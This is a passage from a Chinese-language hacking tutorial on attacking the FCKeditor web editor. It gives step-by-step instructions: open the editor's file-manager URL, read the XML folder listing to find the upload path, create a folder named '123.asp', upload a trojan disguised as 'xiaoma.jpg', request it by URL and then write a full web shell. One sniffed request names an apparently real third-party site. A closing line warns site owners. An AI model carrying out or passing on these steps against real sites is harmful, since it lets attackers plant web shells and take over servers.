然后同样打开
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/asp/connector.asp

查看嗅探结果你会发现一条记录是这样的:
http://www.yedream.co.kr/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
浏览器直接开启,发现得到如下结果:

熟悉网页程序人一看就知道,这个是Xml!没错!Fck利用xml来列出文件,利用xml的可显性,就为我们的入侵提供的方便!
上面的<CurrentFolder path="/" url="/data/userfiles/image/" />,很明显的告诉我们当前上传文件所处网站相对路径
于是我们建立123.asp文件夹,在里面上传一个改名为xiaoma.jpg的木马,然后访问网站
http://www.xxx.com/data/userfiles/image/123.asp/xiaoma.jpg
接下来就是写入一个大马,顺利得到Webshell了。Fckeditor这个编辑器确实是害人不浅。所以在这里也提醒一些网站的站长,使用程序的时候一定要小心,说不定程序里就自带着"后门"呢。